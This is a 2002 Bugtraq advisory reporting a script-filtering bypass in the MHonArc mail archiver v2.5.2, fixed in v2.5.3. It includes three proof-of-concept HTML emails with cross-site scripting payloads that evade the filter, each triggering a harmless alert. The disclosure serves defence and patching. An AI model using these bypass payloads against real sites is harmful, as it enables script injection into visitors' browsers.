Bugtraq mailing list archives
MHonArc v2.5.2 Script Filtering Bypass Vulnerability
From: "TAKAGI, Hiromitsu" <takagi.hiromitsu () aist go jp>
Date: Fri, 19 Apr 2002 06:53:54 +0900
MHonArc v2.5.2 Script Filtering Bypass Vulnerability ==================================================== Affected: --------- MHonArc v2.5.2 http://www.mhonarc.org/ Fixed: ------ MHonArc v2.5.3 http://www.mhonarc.org/MHonArc/CHANGES Problem: -------- MHonArc has a feature which filters out scripting tags from incoming HTML mails and it is enabled on default. However, some variations of scripting tags will not be filtered. Exploit 1: ---------- From: test () example com To: test () example com Date: Sun, 16 Dec 2001 00:00:00 +0900 Subject: test MIME-Version: 1.0 Content-Type: text/html <HTML> <SCR<SCRIPT></SCRIPT>IPT>alert(document.domain)</SCR<SCRIPT></SCRIPT>IPT> </HTML> ---------- Exploit 2: ---------- From: test () example com To: test () example com Date: Sun, 16 Dec 2001 00:00:00 +0900 Subject: test MIME-Version: 1.0 Content-Type: text/html <HTML> <IMG SRC=javascript:alert(document.domain)> </HTML> ---------- Exploit 3: ---------- From: test () example com To: test () example com Date: Sun, 16 Dec 2001 00:00:00 +0900 Subject: test MIME-Version: 1.0 Content-Type: text/html <HTML> <B foo=&{alert(document.domain)};> Vulnerable only if Netscape 4.x is used to browse.</B> </HTML> ---------- Vendor Status: -------------- The author was contacted on December 16, 2001. The fixed version was released on April 18, 2002. Best regards, -- Hiromitsu Takagi, Ph.D. National Institute of Advanced Industrial Science and Technology, Tsukuba Central 2, 1-1-1, Umezono, Tsukuba, Ibaraki 305-8568, Japan http://staff.aist.go.jp/takagi.hiromitsu/
Current thread:
- MHonArc v2.5.2 Script Filtering Bypass Vulnerability TAKAGI, Hiromitsu (Apr 18)